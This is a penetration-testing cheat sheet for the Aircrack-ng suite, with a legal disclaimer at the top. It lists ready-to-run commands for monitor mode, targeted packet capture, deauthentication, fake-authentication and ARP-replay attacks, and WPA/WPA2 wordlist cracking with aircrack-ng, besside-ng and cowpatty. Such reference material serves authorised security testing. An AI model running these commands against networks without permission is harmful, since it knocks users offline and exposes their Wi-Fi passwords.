Ultimate Aircrack-ng Comprehensive Cheat Sheet 2025
Legal Disclaimer: This tool should only be used for legitimate security testing with explicit permission. Unauthorized network intrusion is illegal and unethical.
1. Installation & Prerequisites
sudo apt-get update && sudo apt-get install aircrack-ng
Install Aircrack-ng suite on Debian/Ubuntu
sudo pacman -S aircrack-ng
Install on Arch Linux
sudo dnf install aircrack-ng
Install on Fedora
2. Wireless Interface Management
iwconfig
List wireless interfaces
airmon-ng check
Check for processes that might interfere with monitor mode
airmon-ng start wlan0
Enable monitor mode on wlan0
airmon-ng stop wlan0mon
Disable monitor mode
3. Network Scanning Techniques
airodump-ng wlan0mon
Scan and display all nearby wireless networks
airodump-ng -c [channel] --bssid [MAC] -w [output] wlan0mon
Target specific network and capture packets
Scanning Parameters
| Parameter | Description |
|---|---|
| -c [channel] | Specify a specific WiFi channel |
| –bssid | Target specific MAC address |
| -w [filename] | Write captured packets to a file |
4. Attack Techniques
aireplay-ng -0 [count] -a [AP MAC] -c [Client MAC] wlan0mon
Deauthentication attack (force client disconnection)
aireplay-ng -1 0 -e [ESSID] -a [AP MAC] -h [Fake MAC] wlan0mon
Fake authentication attack
aireplay-ng -3 -b [AP MAC] -h [Fake MAC] wlan0mon
ARP replay attack for packet generation
5. Password Cracking
aircrack-ng -w [wordlist] [.cap file]
Crack WPA/WPA2 using wordlist
aircrack-ng -w [wordlist] -r [rules] [.cap file]
Crack with wordlist mutation rules
Cracking Strategies
| Strategy | Description |
|---|---|
| Dictionary Attack | Uses predefined wordlists to guess passwords |
| Bruteforce | Attempts all possible character combinations |
| Hybrid Attack | Combines dictionary and bruteforce methods |
6. Advanced Techniques
besside-ng wlan0mon
Automated WEP/WPA cracking
cowpatty -r [.cap file] -f [wordlist] -s [ESSID]
Alternative WPA cracking method
7. Tool Compatibility & Wireless Standards
| Wireless Standard | Cracking Difficulty | Notes |
|---|---|---|
| WEP | Easy | Highly vulnerable, quickly crackable |
| WPA | Moderate | Requires 4-way handshake capture |
| WPA2 | Difficult | Strong encryption, needs substantial computational power |
| WPA3 | Very Difficult | Enhanced security, SAE protocol |
8. Troubleshooting & Performance
Common Troubleshooting Steps:
- Ensure wireless adapter supports monitor mode
- Update Aircrack-ng to latest version
- Use compatible wireless adapters
- Check driver compatibility
